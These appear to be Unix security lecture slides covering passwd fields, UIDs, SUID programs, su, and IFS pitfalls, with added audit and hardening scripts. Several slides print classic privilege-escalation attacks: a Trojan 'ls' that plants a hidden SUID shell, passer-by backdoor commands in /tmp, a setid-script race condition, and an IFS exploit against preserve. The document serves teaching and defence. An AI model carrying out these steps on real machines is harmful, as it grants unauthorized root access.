1 The Attack and Defense of Computers Dr. 許 富 皓. 2 Passwords in Unix/Linux Systems.


1 The Attack and Defense of Computers Dr. 許 富 皓

2 Passwords in Unix/Linux Systems

3 /etc/passwd
Format:
    rachel:eH5/.mj7NB3dx:181:100:Rachel Cohen:/u/rachel:/bin/ksh
Fields, in order: account name, encrypted password, uid, gid, user name, home directory, login shell.

4 System Function Account
Unix creates special accounts for a variety of system functions (e.g. daemon/sys, ftp, nobody, uucp):
    daemon:*:1:1::/tmp:
    ftp:*:3:3:FTP User:/usr/spool/ftp:
    nobody:*:60001:60001::/tmp:
    uucp:*:4:4::/usr/spool/uucppublic:/usr/lib/uucp/uucico
The * password field prevents users from using login to log into the system with these accounts (this does not cover trusted host/user access such as rlogin).

5 Password Crackers
John the Ripper password cracker (Linux)
Ophcrack 2 (Windows)

6 One Time Password
Password list
Small Card Calculator

7 UID, GID, and SUID

8 Account Name and UID
UID 0 → root.
A system identifies a user by her/his UID, not her/his name, e.g.
    Name: root, UID: 100 → no root privilege
    Name: doggy, UID: 0 → root privilege
Good habit: the user name root should be reserved for system administrators.
Users with different user names but with the same UID are treated as the same user by the system.
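
An audit of a passwd-format file for the conditions these slides describe (a non-root name with UID 0, several names sharing one UID, an empty password field), as an added example that is not part of the original slides. The sample data is constructed, `HASH` is a placeholder, and the function name `audit_passwd` is hypothetical.

```shell
#!/bin/sh
# Constructed sample in classic /etc/passwd format (not from a real system).
# The rachel hash is the one shown on the slide; "HASH" is a placeholder.
SAMPLE_PASSWD='root:HASH:0:0:System Administrator:/:/bin/sh
daemon:*:1:1::/tmp:
ftp::3:3:FTP User:/usr/spool/ftp:
rachel:eH5/.mj7NB3dx:181:100:Rachel Cohen:/u/rachel:/bin/ksh
rcohen:HASH:181:100:R. Cohen:/u/rcohen:/bin/ksh
doggy:HASH:0:100:Doggy:/u/doggy:/bin/sh
broken:line'

# audit_passwd: read passwd-format lines on stdin, print one finding per line.
audit_passwd() {
    awk -F: '
        NF != 7                 { print "MALFORMED line " NR; next }
        $3 == 0 && $1 != "root" { print "UID0 " $1 }      # root by UID, not by name
        $2 == ""                { print "EMPTYPW " $1 }   # no password required
        ($3 in owner)           { print "DUPUID " $3 " " owner[$3] " " $1 }
        !($3 in owner)          { owner[$3] = $1 }        # remember first name per UID
    '
}

printf '%s\n' "$SAMPLE_PASSWD" | audit_passwd
```

On a live system the same function reads the real file: `audit_passwd < /etc/passwd`.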

9 Real UIDs and Effective UIDs
A Unix process has at least these two IDs:
Real UID: the process owner's real identity; it matches the username the owner logged in as.
Effective UID: the system decides a process's privileges based on this ID.
Usually, the above two IDs of a process are the same.

10 When a suid program is run, the process involved takes on an effective UID that is the same as the owner of the file, but the real UID remains that of the user who created the process.
chmod 4xxx filename, e.g.
    $ chmod 4757 program_name
    $ ls -al
    ..
    -rwsr-xrwx root user Sep program_name
The s in the owner's execute position is the suid program indicator; such a program is called a setuid or SUID program.

11 setuid Program Examples
su
passwd

12 Group
Each user belongs to a primary group that is stored in the /etc/passwd file.
The /etc/group file contains every group and its gid in a system:
    vision:*:101:keith,arlin,janice
    users:*:100:
    startrek:*:102:janice,karen,arlin
Each user can belong to several different groups, but her/his gid can be the gid of only one of the groups to which she/he belongs.
A user can use the command newgrp to change her/his gid.

13 su: Substitute User
    % whoami
    tim
    % su john
    Password: *******
    % whoami
    john
    ========================================
    % su
    Password: ********
    # whoami
    root
    #
(Annotations: the second Password: prompt takes the super user password; # is the new prompt.)

14 Security Problem with su
Type /bin/su -
The full path /bin/su:
1) avoids a Trojan horse (another program with the same name in one of the directories listed in the PATH variable);
2) the access rights of the directory that contains the Trojan may not be set correctly.
The - causes the sub-shell to read all relevant startup files and simulate a login; therefore, the new shell uses root's environment variables, including PATH.

15 Stealing Superuser Account
A Trojan horse shell script with the name ls.
1) Change the access right of the user's home directory so that the victim must use the root account to see the content of this directory.
2) Create a file named -f.
Assume: root's PATH variable is as follows: .:xxxxxxx
Observation: when going into a directory, the first command a user types usually is ls.
    % cat ls
    #!/bin/sh
    cp /bin/sh ./stuff/junk/.superdude
    chmod 4555 ./stuff/junk/.superdude
    rm -f $0
    exec /bin/ls
    ====================================
    % cd
    % chmod 700 .
    % touch ./-f
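
A check for the PATH conditions that slides 14 and 15 depend on (a `.` or empty entry, a relative entry, or a directory anyone can write to), as an added example that is not part of the original slides. The function name `audit_path` and the finding labels are hypothetical.

```shell
#!/bin/sh
# audit_path PATH_STRING: print one finding per unsafe entry; no output means
# every entry is an absolute directory that is not world-writable.
audit_path() (
    rest="$1:"                  # sentinel colon so a trailing empty entry is seen
    while [ -n "$rest" ]; do
        dir=${rest%%:*}         # next entry
        rest=${rest#*:}         # remainder after the first colon
        case $dir in
            '') echo "EMPTY" ;;             # an empty entry means current directory
            .)  echo "DOT" ;;
            /*) # -H resolves a symlinked directory such as /bin -> usr/bin
                if [ -n "$(find -H "$dir" -prune -perm -0002 2>/dev/null)" ]; then
                    echo "WORLD-WRITABLE $dir"
                fi ;;
            *)  echo "RELATIVE $dir" ;;
        esac
    done
)

# Audit the PATH of the current shell; run it as root to audit root's PATH.
audit_path "$PATH"
```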

16 Account Steal by Passersby
    $ cp /bin/sh /tmp/break-acct
    $ chmod 4755 /tmp/break-acct
When a user leaves her/his terminal unattended, a bystander can easily create a backdoor just by typing the above commands.
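
A detection sweep for what this slide leaves behind, a set-uid file that is a copy of a shell, as an added example that is not part of the original slides. The function name `suid_report`, its optional reference-file argument and the output labels are hypothetical.

```shell
#!/bin/sh
# suid_report DIR [REFERENCE]: list set-uid regular files under DIR, sorted,
# with the owning uid. A file that is byte-identical to REFERENCE (default
# /bin/sh) is tagged SUID-SHELL-COPY, everything else SUID.
suid_report() {
    ref=${2:-/bin/sh}
    # -perm -4000 matches any mode with the set-uid bit; -xdev stays on one filesystem
    find "$1" -xdev -type f -perm -4000 2>/dev/null | sort |
    while IFS= read -r f; do
        owner=$(ls -ldn "$f" | awk '{ print $3 }')   # numeric uid of the owner
        if cmp -s "$f" "$ref"; then
            echo "SUID-SHELL-COPY uid=$owner $f"
        else
            echo "SUID uid=$owner $f"
        fi
    done
}

# World-writable directories are where a passer-by can drop such a file.
suid_report /tmp
```

A file tagged `SUID-SHELL-COPY` with `uid=0` is the backdoor from the slide; any set-uid file under /tmp deserves a look.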

17 Shells and Shell Scripts

18 Shell
Also called a command line interpreter.
When you log in to a system, it displays a prompt on the screen and waits for you to enter a command.
A running shell is also a process.
Some of the famous shells:
    Bourne shell (/bin/sh)
    Bourne Again shell (/bin/bash)
    Korn shell (/bin/ksh)
    C shell (/bin/csh)

19 Shell Script
A shell script is a series of commands written in a plain text file.
In order to make a shell script executable, its file permission must be changed to executable.
Usually the first line of a shell script is #! shell, followed by a series of commands.

20 Security Problems of SUID Shell Script
Two shells are involved in the execution of a shell script:
1) the shell that accepts the shell script command;
2) the shell that executes the shell script.
Race condition: between the time the kernel opens the file to see which interpreter to run, and when the (now-set-id) interpreter turns around and reopens the file to interpret it, an attacker might change the file (directly or via symbolic links).
    $ cd /tmp
    $ ln /etc/setid_script temp
    $ nice -20 temp &
    $ mv my_script temp
Here my_script is the attack script. The script is opened twice: 1. by the kernel; 2. by the executing shell.

21 Solution: /dev/fd
When the kernel passes the name of the set-id script to open to the interpreter, rather than using a pathname (which would permit the race condition), it instead passes the filename /dev/fd/3.

22 IFS Security

23 IFS Environment Variable
The IFS specifies which characters separate the words of a command line.
It is normally set to space, tab, and newline.

24 IFS and Shell Script Security
By changing the IFS, a hacker can change what programs our script executes.
Our script calls the /usr/bin/passwd program. Changing the IFS to "/" with
    % export IFS='/'
causes the script to no longer run /usr/bin/passwd, but instead run usr bin passwd.
Now a hacker can create a script called usr that generates a root shell.

25 Security Hole in /usr/lib/preserve
(Diagram of a vi session:)
1. telnet
2. disconnect
3. preserve saves the edited file in a restricted area
4. recover program reads the file from the area

26 /usr/lib/preserve and /bin/mail
preserve was installed SUID root.
preserve ran /bin/mail as the root user to alert users that their files had been preserved.
preserve executed the mail program with the system() function call.
The string passed to system() is parsed into command, options, and arguments according to the content of IFS.

27 Change IFS to Execute a Different Program/Script
If IFS='/', then preserve will execute bin mail instead of /bin/mail.
    % cat bin
    #!/bin/sh
    cd /home/mydir/bin
    cp /bin/sh ./sh
    chown root sh
    chmod 4755 sh
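
A hardening preamble for shell scripts that run with more privilege than their caller, with a helper that shows how an inherited IFS re-splits a command path, as an added example that is not part of the original slides. POSIX shells apply IFS only to the results of expansions, so the helper splits an unquoted variable; the names `fields` and `harden_env` are hypothetical.

```shell
#!/bin/sh
# fields STRING: split STRING exactly as an unquoted expansion is split under
# the current IFS and print each resulting word in <>.
fields() {
    set -f                      # keep the demo about splitting, not globbing
    set -- $1                   # deliberately unquoted: IFS decides the words
    set +f
    out=
    for w in "$@"; do out="$out<$w>"; done
    printf '%s\n' "$out"
}

# harden_env: preamble for a privileged script. Never trust an inherited IFS,
# PATH or shell start-up variable; call this before anything else runs.
harden_env() {
    IFS=$(printf ' \t\nx'); IFS=${IFS%x}    # space, tab, newline
    PATH=/usr/bin:/bin; export PATH
    unset ENV BASH_ENV CDPATH
}

cmd=/bin/mail
( IFS=/;             fields "$cmd" )    # <><bin><mail>
( IFS=/; harden_env; fields "$cmd" )    # </bin/mail>
```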